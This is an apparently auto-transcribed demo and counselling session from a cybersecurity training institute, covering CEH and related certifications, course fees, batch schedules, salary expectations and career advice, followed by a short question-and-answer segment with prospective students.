Before we start, can I get the attendance for today? Just mention your name. Reply only to me. Don't reply to all. Okay. Mention your name, phone number, and location. That is enough. This is a demo session and a basic workshop. It is not like mandatorily you need to attend any of the trainings. We'll give the brief overview on each and every training and to whom it is intended for. What are the cyber security career paths? How is it going to help you in future? So mainly we look it, you can consider this as cyber security counseling. You can consider, or it is like to get some essence of how these trainings on cyber security certifications, all these are planned. Last 30 seconds, just give your attendance with your name, phone number to contact and location. Thirty seconds to go. 1 minute. This is the agenda for today's workshop or demo, whatever it is. There is a small change in the program. I'll let you know that. We'll start with my introduction for 5 minutes and about the hacker book. Then after that, I'll give a brief walkthrough of the course content for cybersecurity, CH, and the training batch when we are going to start both online and offline weekend batches. Then we'll have a good discussion on cybersecurity related courses, certifications, and the job opportunities. Along with that, we can have Q&A. So mostly this session is meant for asking you some questions on any of these cybersecurity trainings, and you get the best answer for it. Once that is done, we'll go through some demos on web as part of your job roles. What do you do, and what are the different kinds of hacking techniques which you should be familiar with? Those things we consider as part of this demo on web and system hacking. And this mobile hacking, SIM tools, and then cloud security, DevSecOps. We'll take it as a separate session. Today we'll go for 2 hour session, and if time doesn't permit, another 2 hours in the next week. We are splitting these workshops. Maybe like till Q&A, everyone can attend. After that, if you're already attended my cybersecurity demo on web and system hacking, you guys can drop out. Mobile hacking, SIM tools, I'll give a brief overview today, but the actual workshop with the real-time hacking will be considering in the next session only. Okay, but overview will be given for all these three as well. The workshop will be on the next week because SIM tools is from a different trainer, and he has some priority work. Mobile hacking is from me. Cloud hacking is also from me. Okay. Yeah, everyone given your attendance. If not, just post your details only to me, reply only to host. Okay, fine. Let me start with my introduction. I'll not take much time because most of you already know, I guess, because you inquiry for the trainings, certifications, trainer, and then get into the demos or trainings, right? As a trainer, I have around 4 to 5 years of experience. In fact, for the CH, I would prefer at least a trainer who has minimum of 10 years of experience for CH trainers. Means cyber security training. 1 second, guys. Okay, that's great. I'll be the trainer for most of the course contents, but the few more specializations are there. We have some dedicated trainers as well. But when it comes to the CH training, this is a when you want to start cyber security, either with experience or without experience. Without experience means as a fresher. With experience means already you are working as a developer or a tester or DevOps engineer or cloud engineer. You want to move to the cyber security. So always I would recommend you have to start with CH, Certified Ethical Hacker, along with job-oriented training. Job-oriented training means like there are some process which you should know if you want to work in any IT organization, along with certification, at least one certification. So the next batch for CH is going to start from Tuesday, that is May 2nd, and we have weekday batch and weekend batch, both online and offline. And when it comes to the hacker book, we always give the best trainers as it is initial training or the first training to begin with in cybersecurity. This time we'll have two trainers. I'll be taking the weekdays batch, and another trainer we have with 14 plus years of experience who has done 7 to 8 certifications. Right? We'll discuss that, and then these are some of the certifications which I have done so far, and two more are there along with these things, like case certified application security engineer, ECSS, ECSC. This you guys are already familiar with. Now let us move on to the different training programs which we are offering from HackerBook in the upcoming months. Real-time security training. Basically, you are going to learn all these things. On a high level, you are going to learn these basics: software engineering, OS basics, computer networks, web technologies, database basics. Then we'll move on to the ethical hacking and labs. Without these basics, it is not possible for you to learn ethical hacking labs. So just as a tradition from HackerBook, we always give all the basics before we get into the cyber security. Okay, it is like you are starting from zero knowledge. It doesn't matter whether you have worked in the last 10 years or not, whether you are in IT or non-IT. Definitely everyone will be able to learn cybersecurity without any knowledge. We are going to guide you that. You just need to have a laptop and you should know how to log into the laptop. That's it. The rest will guide you, whether it is online or offline. Completely, it is a real-time training, which means that if you have trained from us, you can start your job on day one from any company. There is no need for you to depend on any other persons. Okay. That's how like our training is organized. Our course curriculum is prepared. Okay, along with these trainings, we will give you the recorded videos of each and every session, and then softwares that are required for the training, then resume preparation, project and profile building. Real-time projects will give you, and then profile, Naukri profile or LinkedIn. How do we create based on your experience? Then job assistance. What is meant by job assistance? We'll try to monitor how you are doing your interviews, like whether you are able to by doing some mock interviews. Basically, we'll see like how you are performing, and we'll try to identify some of the gaps which is required for you to clear the interviews. All those things will help you in the job assistance. Under the conditions, there should be a good job market. In case if there are no opportunities or very less opportunities, definitely you will get the job, but the thing is you may have to wait. Let me consider one of the example like that. From Hackerbook, minimum of 15 jobs our students will get on every month. But only in the month of March, we don't have any jobs in the last March. It is a financial year end, and there are very less opportunities. But again, like if you see in the month of April, we do have around 12-13 offers for our students who has been trained on real-time security testing and CH certification. Ethical hacking certification. CH means certified ethical hacker. And prior to that, January, February, December, everyone know like it is a recession time. Only cyber security hiring is happening only in cyber security. If you consider any other domains, I would say like literally zero recruiting. Yes, of course, if there are, for us to get more job vacancies, the software market should be good, the business should be good, all the banking, financial, healthcare domains, if they are doing good, then we get a lot of job opportunities and more demand for the engineers. If those are not doing good, they can avoid developers, they can avoid testers, they can avoid product teams, but they cannot avoid security, right? If the business is not doing good, we cannot keep aside the security. That's the main thing. That is one of the main reason why cyber security engineers are given a lot of priority. Okay. The next thing, interview questions and answers. We have a lot of training programs. I'll show you in the next slide. For each and every training program, we provide you the interview questions and answers. More commonly asked, 95%, minimum 95% of all the interviews will be considered from our interview questions and answers. Out of 100, I would say like 90 people, a minimum 90%, they get placed by themselves, whether they are a fresher or they have a career gap or education gap. After our training, they'll be able to get into any of these jobs without any help from anyone. That's how like these sessions. One second, guys. Yeah, am I recording the session? Yes, right? Yeah. I'll post this in the YouTube. There is no need for you guys to record again. Okay. Okay, this is all about real-time security testing and cyber security CH. Any of you who wants to start your career in cyber security, you need to start with CH and then along with real-time security testing or real-time cyber security. Once this is done, then we get a lot of different specializations, which I have shown it in the initial screen. We'll discuss that as well, along with the question and answers. But this is the base. From here onwards, once this basics are done on cyber security, depending on your interest, you want to learn website hacking, or you want to learn network hacking, or mobile, or any kind of industrial plants, or automotive, or airspace. There are a lot of different areas are there where the cyber security is relevant. Depending on your interest, depending on the opportunities, you get placed and you work on that specific domain. Okay. That's it. This is all we are going to learn as part of 2.5 month program. Manual testing is that this is for the freshers. Okay. And we are going to start this in the month of June. Freshers or interns or 0 to 3 years of experience. If you are not interested in cyber security and you need a job, you just need a job to get into the IT, we'll help you by covering a lot of concepts along with manual testing. Manual testing means outside institutions, it is meant for only functionality testing. But whereas in HackerBook, we try to give some additional topics like system administration, mobile testing, DevOps, API testing, cloud, identity and access management. A lot of other areas are there which will guide you for the job purpose. So this is for 0 to 3 years non-cyber security candidates. Okay. This will start in the month of June, not in the month of April or May. Let us talk about the certifications. We'll discuss this in the next slide. Very interesting. How do you plan your career in cybersecurity? Okay. And coming to the trainings, as I said, May 2nd, that is coming Tuesday, we are going to start our regular batch, online morning batch, 7:30 a.m. to 9 a.m. It is going to get finished in 2 months, 1 hour to 1.5 hours. It is like 7:30 to 8:30 or 7:30 to 8:45, depending on the topic which we are going to discuss. At max, it will take 2 months of duration, and it is a morning weekday batch. Right now, evening batch is going on. It is already full, and anyone cannot get into the evening batch. So this is for cyber security, real-time security testing plus CH certification. For CH certification, this is a global certification from EC Council. You guys may have to purchase the voucher. For that, you can contact this above number, our staff number 854-999-5000. For any of these details, course start date, start time, end time, or like different types of trainings, you always get in touch with this number. And coming to the weekend batch is again going to be the classroom training. It is only classroom training, no online training. Or if the equipment is ready by then, we'll enable online as well for this training program. But as of now, this is meant for a weekend batch on offline, that is classroom session, which is starting from June 3rd. And the trainer for weekend batch is a different trainer. Of course, he is a very well experienced trainer. He's like me, like you consider me like 15 plus years of experience with 7 to 8 certifications. And one trainer, Ravi, who works as a security manager, he has 14 plus years of experience, and he has done a lot of certifications related to the cyber security, cloud, all those things. You can consider like some of the certifications are CH, Certified Ethical Hacker, Certified Cloud Security Engineer, Certified DevSecOps Engineer, then ITEL, which is meant for infrastructure, and then COBIT, which is meant for some kind of audits again, then JetScaler, which is like administration and zero trust security architect. Like that, he has done 9 to 10 certifications. Usually for CH training, 5 to 6 years of experienced trainer is enough, but from HackerBook, we always give you the best, who has trained a minimum of 8 certifications and with minimum of 10 plus years of experience in cyber security and IT security. Okay. So depending on your convenience, you can get enrolled for any of these batches for the cyber security plus CH. Okay. That's good. And then as I said, manual testing will start in the month of June for freshers and 0 to 3 years of experience. It will be in the weekdays. Okay. And classroom combined with online in the morning hours. As of now, the freshers job requirement is a little low compared to the 1 year back. Just to speak frankly, like you would have seen like a lot of news with respect to the fresher hiring. Most of the freshers who has been offered the offer letter, who has been given the offer letter 1 year back, 1.5 year back, those are not onboarded in the last 1 year because of the recession. The same is getting continued now. Hopefully from May or June onwards, freshers market also will be good. Freshers requirement will be good. We plan from June onwards some of the trainings for freshers or even 0 to 2 years or 3 years of experience who are not interested in cyber security. Cyber security really requires good communication. Technically, we are going to help you, whether you are a fresher or 5 years of experience or 15 years of experience or even 20 years of experience. We have the training programs for your experience level. Okay, that's good. These are some of the certification programs. I'll try to guide you these certifications now. Most of the students, whoever meet me, they think like cyber security means only one training, and they want to get that training and they want to get into the job. From then onwards, they will be working on the cyber security. It is not like that. Cyber security is a very broad, and it will be very depth. I can say like, even if you study for next 30 years, still there will be few things which are like not covered as part of cyber security. Okay, let us pay more attention on this slide, because I know like some of my students who has already attended CH training or real-time training, you might not be aware like what to do in the future, right? So this is how like you need to plan your career. First, you are getting enrolled to the real-time security testing plus CH certification. This is relevant for freshers to 3 years of experience. If you are having 3 years of experience, it means like at least one certification should be there in your profile, so that you can proudly say like you are a certified engineer. Nowadays, most of the good interviews, most of the good packages has been offered only for certified engineers. I'll show you some of the companies where our students got placed in the last 2 years, who has taken the certifications, and I'll explain like each and every course and certification here with the relevant package. Okay, so for CH, for 3 years of experience, as of now, the average package is 12 lakhs per annum, and the maximum package who has got with CH certification is 18 lakhs per annum in our institute. I don't know about outside. This is based on the facts where our students has been trained. Okay, once you have done this training and CS certification, you have been working from last 2 years. Now you want to get, or you want to learn some more new things, so that you'll be more occupied with technical things, and your professional career will be good. For that, you can choose any of these specializations. Okay, a lot of specializations are there. Each is into one different area. I'll guide you. Okay, the second level of specializations, all these are for, you can consider as, you even with 2 years of experience also you can do that. That is not a problem, but I would say 2 years to 10 years, you guys have to have at least 2 along this in this second level of certifications, minimum 2 certifications. Of course, I see a question from one of the student. Do you have exam for the certifications? Yes, of course. There will be an exam from EC Council. CH is from EC Council, and all the second level certifications are from EC Council only. They conduct the online exam, and it will be monitored by the EC Council proctor. You need to finish the training, prepare for the certification, and if you get any online commonly asked questions and answers, prepare that, then attempt the certification. If you are failing in the certification, say for example, CH will cost 42,000 certification. If you are failing in the certification, again it is going to cost you for the exam retake. It will cost you around 30,000, right? So you really need to put like some kind of hard work. It is not so easy, but we are there for you to guide you in a very best manner how to get trained and how to get certified. If you are attending all our sessions in time, for example, CEH training is there for 2 months. If you're thorough with all the concepts which we have discussed in the 2 months of training, and if you haven't missed any of the classes, definitely you can pass the CEH certification. That's how like our course content and CEH is aligned with. Okay, yeah, let us come back to the next level of certifications. You want to purely get into the deep hacking. Extreme hacking means you don't want to become manager, or you don't want to become architect or nothing like that. Your objective is just hack. That's it. If someone shows you some device, or mobile or device or IoT or camera or refrigerator or a vehicle or some kind of a device in the plane, whatever it is, you want to hack it. That is your objective. Then you should go for this first path. Once you are done with CH, once you're done with CH, you can take CH practical. CH exam will be like multiple choice questions. Okay, multiple choice questions in the sense it will be for 4 hours, and all these within these 4 hours you get 125 multiple choice questions. You need to score 70% for CH. So there will not be any kind of practical labs. But whereas CH practical, you'll have 6 hours of labs, and then you need to hack and then crack the flag. That's how the CH practical is designed. Okay, there is a certification that is called CH master that comes with CH theory plus CH practical. These two together also you guys can plan it. Okay, assume like for 3 years of experience you have finished CH plus CH practical. Then the next one more toughest certification what you can plan is pen testing, penetration testing, certified pen tester. Okay, along with this, in case if you are interested in programming, this is like mostly developers will try to do it. Case source code. On the left hand side, whatever you see, these are, you need to have some basic programming language. CH practical, source code analysis, certified pen tester, and even OSCP. Case is completely source code, whereas the CH practical, C pen, OSCP, these requires some basic knowledge, how to create shell script, how to create batch script, try to understand some basic JavaScript. No need to write program, but you should know at least how to put payload. Payload means small line of code. That's it. Okay. This is with respect to the deep pen testing or extreme hacking we can consider. You have worked for 10 years, 12 years into completely an extreme hacking, and you have achieved these certifications, and you are fed up and you want to become a manager or architect or director, then you can plan for CISSP, Certified Information Security Professional. Or you can plan for Chief Information Security Officer. CISO is head of cyber security, head of information security for any organization. Each company will have one CISO. Each company will have one CEO, right? Similar to that, each company will have one CISO. If you want to get into this role, you need to have at least expertise in 3 or more specializations, because you need to handle the things that comes from the cloud security. You need to handle the things that comes from extreme hacking. You need to handle the things that comes from forensic investigation. Does anyone know what is meant by forensic investigation? Reply in the chat window. Who knows forensic investigation? If you guys want to take a picture of this, you guys can take it for your reference. It looks very good, right? How to proceed further? It takes 10 years, guys. If you are very sharp, 5 years it will take for you to do all these certifications. Where I am standing right now, I have done CH, I have done cloud security, I have done source code analysis, and then this I haven't done, but I have worked on this. Forensic investigation I haven't done, but I did work on this. DevSecOps I have worked, even I had the certification. Then next I'm trying to target for CPENT. Okay, but I already did CISSP. This is one of the toughest certification. 20% is the pass guarantee. Means only 20% will be 20% of the candidates will pass CISSP in the first attempt. Rest of the people will fail. Still, there is a more craze, more demand for this certification. You need to have at least 5 years of experience in cybersecurity if you want to take up CISSP certification exam. Okay. Yeah, forensic investigation means, assume like some of the hackers has gained access to the some IT companies infrastructure. They have logged some of the computers, they deleted some of the data, sensitive data, bank accounts, customer related details they have erased from the servers. Now these people will come into the picture. Forensic investigation, they'll try to analyze who has done it, which is the IP address, and how they have done, which is the first system they have got access. So there are some relevant tools. They work on these tools, and then they try to get as much information as possible, which will be helpful for the cyber crime. So that to ensure like these kind of incidents will not happen in the future, and to fix or to remediate the issues that has been caused, right? So this is one of the certification, CHFI forensic investigation. So once you are done with CH, you can plan either of this. You know cloud, right? Nowadays, most of the people, most of the organizations are moving to the cloud. Can anyone tell me one example of the cloud? Cloud service providers. So servers, I don't use servers that are there in my office. I use the servers that are deployed in the cloud service providers infrastructure. AWS, yes, of course, AWS, Azure, GCP, VMware, Oracle, okay, IBM Cloud. These are some of the examples of cloud. So as part of cloud security, certified cloud security engineer certification, you are going to learn how this cloud should be protected, different types of cloud services, APIs, and what kind of prevention mechanism we need to ensure, compliance, data security, application security, infrastructure security of the cloud. So as part of CCSC, you are going to learn all the clouds, especially AWS, Azure, and GCP. Source code analysis, this is required for mobile security. If you are interested in mobile hacking, you need to learn about the source code Java. Case is the certification again from EC Council. We teach you Java for a week, then we'll move on to this course if you are interested. So as of now, SOC Unleashed is the one which is going to start in the second week of May. And then 1 week is there. You guys can attend the demo next week, same timing for this SOC Unleashed. What is meant by CSA? Certified SOC Unleashed. This is a monitoring tool. Say, for example, how I can say is, you want to track what each user is doing and what each computer is doing, what kind of events or issues are happening within your infrastructure. Those will be taken care in the SOC analysis. CH practical, CPENT, OSCP. These are all from the offensive purpose. Offensive means people are trying to hack, right? Offensive means there is a company or IT infrastructure, you are trying to hack it. But within the company, there will be security engineers, right? They try to monitor what other people are doing from outside, what insiders are doing. Each and every activity is monitored. Say, for example, you got a job and then you are working in one of the IT organization. Daily 1 hour, you are watching YouTube videos and you are watching some Instagram or Telegram videos, all those things. Twitter, Instagram, you're watching. You watch it when no one are there behind you. Okay. You are watching those videos when no one are there behind you. You think like no one are watching your activities. Actually, each and every activity has been monitored whenever you do any kind of work with your office laptop. How it is monitored? It is monitored with the help of SIEM tools, QRadar, Splunk, Alien Vault. All these are SOC monitoring tools. Okay. Yes. One second, guys. Let me cover another certification, then we'll move on to the question and answers. Okay. Cost of the SOC. Cost of the SOC with certification is, it will cost you 28,000 plus GST, 28K plus GST. It is training cum certification from EC Council. You can get in touch with 5,000 number for more details. More details in the sense, you will get the course content, brochure, what are the relevant jobs are there on the SOC, training cost, certification cost, everything. As I remember, it is 28K plus GST. I think there are some discounts available. You can get in touch with this admin 854 999 5000. He's Anvish. Mostly Anvish is dealing with this number. So he will help you for any kind of details on all these trainings, certifications, job opportunities, references, everything. Contact this number. Okay. I am here only on the technical front. Okay. For any kind of technical questions or technical related job things, I'll help you. Be it a fresher or be it 15 years of experience or 20 years of experience. Technically, you guys can get back to me. But trainings, certifications, cost of these certifications, brochures, everything, you try to reach out to admin. Okay. Yeah. If I would want to choose my cybersecurity career path, I would say like CH, then CH practical, and CPENT, then cloud, then later directly you can directly move on to the CISSP. OSCP also takes a little bit time for preparation. But as of now, like I directly moved from CH. Then there is one more equivalent certification for CH practical earlier, that is called ECSA, EC certified security engineer, that was there earlier. So I have done that and then came back to the CISSP. You guys can plan it accordingly. And when it comes to the one more certification called ECDE, EC Council Certified DevSecOps Engineer. Nowadays, you might be hearing one of the training program called DevOps, right? Development plus operations. One of the toughest job, I would say. Along with the toughest job, you are adding security into that. You need to learn DevOps, you need to learn cybersecurity. That's called ECDE. This program we are going to start in the month of June. If you guys are interested, you guys can get enrolled for that. We will be posting all these details in our website. Our website is also under construction. I will walk through that website so that you get to see the different trainings and then different kinds of jobs. Where are the different areas where you can target? All those things we'll do it. That's it. I think by now we should have got a better idea on different trainings and certifications. So first is 0 to 3 years of experience. Second level of specialization is from 1 year to 7-8 years of experience. Then CPENT, OSCP, CI, SSP, CISO from 5 to 10 years of experience. And the package levels are like average package CH 12 lakhs, CH practical and CPENT 12 to 20 lakhs for 3 years of experience. Case 18 lakhs you get an average with 3 years of experience. CH plus cloud. This one again like 12 to 20. I'm talking about only 3 years of experience. As and then your experience increase, even the package also will increase. What it matters is what are the certifications you have in your hand. Okay. Then CH plus SOC 12 to 15. Then forensic investigation, actually it is a completely different area. You need to have CH, then you can move on to the forensic investigation. ECDE is very much in demand now. A lot of demand for ECDE. Any Android Studio course in ethical hacking? Yes, of course, Android Studio course, we offer it as part of CASE. Source code analysis is there, right? Along with that, we'll teach you mobile hacking. We'll get into the question and answers. Last 5 minutes, okay? SOC monitoring, ECD, DevSecOps is done. OSCP is a certification, not from EC Council, but this is also one of the good certification. You guys can plan it after CPENT. After finishing CH practical, CPENT, you can easily clear OSCP because already you are good in the labs, right? OSCP will cost you 1.2 lakhs and they will give you lab access for a year. If you're not prepared by then, again you need to buy those lab access for another 6 months like that. But whereas CH practical, you get it for 36,000 plus GST, which is very less compared to the other certifications, because you are going to practice all the labs and then along with that you get certification. CPENT also, like you get labs along with certification. OSCP is costly, that's the reason I gave you this path. Similarly, like CH also, like 36 plus GST we are charging, which is very less compared to the CISSP and OSCP. CISSP will cost you 1.4 lakhs, 1.5 lakhs along with training and voucher, same as OSCP. Okay, other training programs are placed. I'll tell you the costing. CH practical 36 plus GST, case 28 plus GST, cloud 36 plus GST, CSA 28 plus GST, forensic investigation is again 28 plus GST, ECDE 28 plus GST. These are the standard prices. These are the standard prices. Maybe you may get some discount if you approach to this number. You message him or call him later after this demo. Okay. Okay. The next one. Are we done? Yes. This slide is already. These are the job opportunities. When you get trained on real-time security testing, see the jobs that VAPT engineer, pen tester, security engineer, security analyst, API pen tester. I'm talking about with CS certification, you can target all these jobs. DevSecOps engineer, SOC analyst, security engineer for web, network, IoT, embedded devices, mobile, risk and compliance. So many jobs are there. Basically, you can just have a look at the slide. That's it. And we have our unique HackerBook manual testing program, not only about software testing job roles. We apply for the jobs related to the API testing, database testing, mobile. Then cloud also will be covered as part of manual testing, cloud testing. Then identity and access management. Identity and access management means, who wants to answer this? What is meant by identity and access management? Reply in the chat window. We are almost done. We'll get into the question and answers. After that, I'll show you 2 or 3 practical labs. What is meant by identity and access management? You want to get into some software company. You are an employee. What do? You have your ID card, right? If you are an employee, then only the access will be approved in that device. Once you get into the company, again, like there are a lot of cubicles, lot of meeting rooms, lot of data centers. Not everyone will have all the permissions. There will be some kind of authorization mechanism, right? This is one example. Thumb impression, facial recognition, palm, right? All this will be handled by the identity and access management tools that will study it for AWS, Azure, GCP, and one more tool that is used on the on-premises. So that is also covered as part of manual testing. Okay. In fact, it is a very good opportunity for people who doesn't want to get into cybersecurity and need an IT job. We'll train you both manual testing and plus some additional topics. Okay. Yeah. That's it, I guess. These are some of the common job roles. This is from CH, not from us. They are referring these jobs in case if you have done the CH, if you are doing the CH. And similarly, if you are doing cloud security, these are the different job roles that are relevant with CH plus cloud security certification from EC Council. Yes, it is a time for the question and answers. Post your questions in the chat window. I'll try to answer. Be it a silly question or whatever the question it is. We have got 10 minutes. I'll try to answer all your questions and answers. All your questions. Does anyone has any doubts? I see some questions from people. Sanjana Chaudhary. Android Studio. Can we use Android Studio for hacking the applications? Android Studio is more of like looking into the code, doing some changes in the code, and building the package. Okay. How it looks like is, let me see if I have launched that. No, I didn't launch it. This is a tool, Android Studio. Say you are trying to build a gaming application. You need to write a code, right? That code you can write it here. This is one approach. Other approach is already someone has developed the application that is of APK file. APK means Android file. Someone has developed the code and you want to do some changes in the code. See your classes.dex. This can be converted into class files. These are the different class files. With the help of Android Studio, you can modify the application. You can put any of your malicious code. Again, you can build the package. That is the use of Android Studio. Okay, it is especially for web applications. You will be trained on this when you get enrolled for source code analysis and mobile security. We will teach you how to build the APK file. We will teach you how to sign. Means like you need to sign the APK file. If without signing, it will not get installed in your mobile platform. In your mobile, you cannot install this APK file if you are trying to install it without signing. So building the application, signing the application, how to generate the keys for signing this, all those things will be covered as part of mobile security. I'll give some brief overview on this in the next session on the next week. Any other questions? Yes, some of you have answered about IAM. That's correct. Naveen and Ram. Okay, one interesting question from Ram. Do you teach us mobile application security testing as part of the CH? Ideally, that is not part of the course, but still we do give training on mobile security if you get enrolled on CH. The question that is asked is, if you are getting trained on CH, is a mobile security going to get covered as part of CH? That is a question. Ideally, that is not. We give some basic overview on the CH as part basic overview of the mobile security as part of CH training. But just because of the demand in the job market, there is huge demand for mobile security for 3 years of experience or 4 years or fresher or 2 years of experience. It is taking some time. Just hold on, guys. It is getting loaded. Oh, it's taking a lot of time. Our website is still under development. It will be deployed soon within. Okay, it will be deployed within a week or so. Always you can reach out to the certifications from this website. Hackerbook.in is the website. This is under construction website. Okay, we list all the certifications and the training programs. One of the question that is asked is, as part of cybersecurity job oriented program, are we covering mobile security? Yes, of course, for you to deliver or to get the jobs, we cover as part of job oriented programming. Mobile security, mobile hacking is also covered. So it will have all the details like course highlights and some of the prerequisite to whom it is, what are the different kinds of jobs you get it. Always you can get into the website for all the details like training, certifications, and jobs. We have listed some of the services. What does it mean by service? Once you finish the training, you can get job in any of these areas. For example, if you scroll down, vulnerability assessment means finding some loopholes you can work. Pen testing is one more area. API pen testing is one more area. Static application security testing. I talked about source code. This is one more area. Software composition analysis. This is also about source code. Okay. Then mobile application pen testing. You can work only on the mobile hacking after finishing our course. So whatever the course you guys are getting trained, the same thing we are providing for service for some other clients. Thick client pen testing. Thick client is basically like desktop based applications you can consider. Okay. There are jobs based on that. And as a company, we do provide services for some of our clients. Software composition. This is DevSecOps. There is some content mismatch. Embedded system security. You can work as an embedded cyber security engineer. Then automotive security. Do you think vehicles can be hacked? vehicles can be hacked? Yes or no? What is the answer? Most of the vehicles are now integrated with internet, right? GPS, cruise mode, or some PLCs, or even Bluetooth, fastags. They use some kind of frequency. Any of these frequencies can be hacked, right? So we have our students who are working on this automotive security. 2 or 3 companies are there which does this automotive security. Okay. Then IoT security. I'm sure like IoT, all of you are knowing. You should have heard this term. You can work even in IoT security. Medical devices. What do you think? Medical devices needs to undergo cyber security uh, assurance programs? Simple example is nowadays people try to put pacemaker. Have you heard of pacemaker? Why do we use pacemaker? In terms of health, all these artificially generated devices are coming up either to monitor your heartbeat, blood pressure, or your the pacemaker is some kind of a chip which they insert to regulate your heartbeat. One of the movie they had shown it like the attacker tries to increase the heartbeat by hacking the pacemaker, right? So that is one of the example. Other example is most of the patients readings, right? uh, all those factors will be recorded in some kind of devices. Those devices, if they can hack it, we don't know. It can control the bad. It can go in a good manner or bad manner also, right? There also we need cyber security. This is a functional testing. So ideally, these are the services which we are providing to our clients, are going to provide to our clients. I'm talking about like different kinds of job opportunities you get. And if you want to see some of the companies where our certified engineers are placed. So from my view, these are the most demanding guys. There are a lot of trainings are there, a lot of certification programs are there. Job oriented program with CH. This is what I recommend for freshers, 2-3 years of experience. If you are not interested in cyber security, you can go through the hacker book training program for freshers or internship program for freshers. Then once you are done with this initial level of training, as part of specialization, you can get into certified cloud security engineer. Then scroll down. These are some of the companies which our certified people who has taken certification from us and got placed in some companies. Many companies are there. MNCs are there like Infosys, Capgemini, Cognizant, and some automotive related. Avin Systems is related to automotives, vehicles. They try to do some kind of security testing for vehicles. And then some companies you should have heard more oftenly seen companies L&T, LTI, Mindtree, KPMG, Tech Mahindra, Emphasis. CISA is completely into audits, security services company. Mindtree is also similarly into that. Some of the companies even I do hear first time, but all our students they try to tell like, okay, we have done the certification and then later we have got a very good package in so and so company. That's how this slide is prepared. Okay. Collins Aerospace. I guess one of the engineer who is certified also working here. They try to protect the softwares that has been developed for airspace, aeroplanes. Okay. Aeronautics. Okay. Yeah. We don't dig too much into like which company is doing what kind of projects, but based on some kind of knowledge, I'm trying to give you these details. Okay. Fine, guys. Now let us get into question and answers. Do we cover both DAST and SAST? That is a question. In fact, DAST we cover, SAST basic overview. as part of a job-oriented program. If you want to get more details, I mean to say like deep knowledge on SAST, you have to enroll for the training and certification. He movie is best example. I have seen Pacemaker. Okay. Any other questions, guys? That's it. No other questions on the job, certifications, training content.
Hari, is it audible to you?
Yes, I have given permissions. Go ahead.
Hari? Sorry to interrupt you.
Go ahead.
I want to know, like, we need to learn coding for the web application security testing.
No, not required. Okay, I already discussed one path, like CH practical is there, source code analysis is there. There is no need for you to learn programming for 5 years of experience. It all depends on the specialization which you are.
Okay,
you are taking some specialization. Say for example, I am taking CH I did, then after that cloud I learned. Then there is no need for me to learn any programming. After learning CH and cloud, directly I will do the CISSP for the manager or architect. That's it. Considering that, no need for us to learn coding.
Okay, I mean CH says like only web application security testing, you mean, right?
No, as part of CH, you are going to learn about web security, API security, network security.
Okay.
Mobile, actually for job purpose, we do cover as part of real-time job-oriented training. But still as part of CH also we cover that, because if you have this knowledge, you get more jobs. And then we
actually
cover
SAST.
SAST also we cover.
Even some
mobile SAST DevSecOps. This will give the overview. Though you don't get full-fledged knowledge, you are doing good in these first 3 areas. And then some basic knowledge on mobile or SAST or DevSecOps will get you a job. That's the reason, as part of our CH plus job-oriented program, we try to cover these concepts. Yeah. Any other questions?
Hi, Hari. Myself, Harshavardhan.
Hi, Harsha.
Yeah, so I'm having total 7.5 years of experience in network security domain, like with respect to the firewalls and a bit into proxy. So I would like to move to, completely into cyber security. Okay.
Yes.
So like, which would be the best, start? Because I'm not aware of anything about CEH, web security, all these things, but I completely into firewall security, that is network security.
Yeah, got it. I would say already you are into security area only, but that is a different stream. I mentioned this stream in my slide. Actually, when we talk about firewall, right?
Yeah.
It comes under endpoint security, where you will be mostly working with firewall, IDS, IPS, antivirus, data loss prevention. But your area is completely into firewall. To extend your knowledge, you need to go for CH first. Okay. Because as I said, CH is like mandatory for any of the specializations. You learn about complete IT ecosystem, threats, different kinds of attacks, all those things. Once that is done, you can take cloud. The reason is there is a huge demand for the cloud security nowadays. For 3 years experience, candidate can easily get 15 to 20 lakhs. And along with that, definitely he has got very flexible work nature, work environment, people who are working on cloud security. The reason why I'm suggesting you cloud is already you worked on the rules, firewall rules, right?
Yeah.
Inbound, outbound, all those things.
Yeah.
And any kind of exceptions, networking, subnetting, all those things you are familiar. The same concepts are applicable again in Azure, AWS, GCP. We don't have resources in the market who are good in the cloud. And parallelly, a person who can work both on the cloud plus cyber security. So the firewall, already you are good in firewall, so 30 to 40% of the knowledge, you already got it as part of this cloud. The rest 60%, you will learn it with respect to the cloud technology and CH. This I would recommend.
Okay. if I want to join in HackerBook, okay. So with CH job oriented I need to take, or CH plus cloud security I need to take the course. Which one I would need to?
You start with CH plus job oriented training.
Okay.
Okay, it will go for 3 months.
Okay.
Once that is done, you clear the certification first, CH. Okay.
Okay.
Then assume like you are trying to shift your domain. Parallel, you can work on the cloud, depending on your budget. If you have good budget, together you can take, not together, at least CH now, it should be in advance for a month, because the terminology you should understand. We call it like some threats or vulnerabilities, zero-day attacks. Some you might be familiar, but still like you should get good experience. 40% of all the training programs base is CH. Okay.
Okay.
So take CH, then give a gap of 1 or 2 months or 3 months, then go for the cloud. This will be the best profile for your experience, and it will be good for the future.
Okay.
I have so many students who has taken this combination. 30 to 40 students are there. Most of them are like 8 years, 10 years, 2 years of experience, and they are working as managers in different companies. If you don't want coding, this is a good combination without coding. Yeah, job market is good, as everyone knows. Like most of the companies, right, they are trying to migrate to the cloud. That's the reason there is huge demand for this. Just because of lack of resources on cloud, most of the companies, what they do is they take CH trained candidates, and after hiring to the project, they'll ask them to go through the cloud concepts, or they only will give the training. That's what is happening now.
Okay. So like to learn CH, do we need to have any programming language?
Not required.
Okay.
I'll share you the course content right now.
Okay.
There is no need for us to go through the. Okay, hold on. This doesn't require programming. CH.
Okay.
You learn about like IT ecosystem, then vulnerabilities, different kinds of attacks you are going to learn. We'll cover one example today, like what exactly we do as part of CH, vulnerability assessment and pen testing we perform. So considering that, one small lab will do. You'll try to understand like there is a concept called vulnerability assessment.
VAPT, yeah.
VAPT. The next one is pen testing. So it is like VA you can do for any kind of targets, not only web, right? We discussed about embedded systems, mobiles, automotives, aeroplanes, any kind of software you can do VA, any kind of softwares you do pen testing. Like these concepts we try to cover for web API network, mobile as part of CH. Here SAST is something related to the coding. Basically it is for developers, but we do cover as part of job oriented training 1 or 2 classes, at least to give you some overview how it works.
Okay. So like, can I get the course content for CH and CCSC?
Yeah, please ping to this number. Okay, he will send you all the details.
Yeah, sure, Hari. Thank you so much.
Fine, Vardhan. Any other questions, guys?
Yeah, this is Chandan.
Hi, Chandan.
Yeah, Hari, being a non-technical,
Yes.
what would be that program? Might be CH will be good or cloud security will be good. What do you suggest?
Both are not related to the programming. Likewise, I would say like without having any knowledge in cyber security, you guys can directly get into the CH. Without having any knowledge in IT or cyber security, you can start CH. Without CH, I don't prefer cloud. Okay.
Okay.
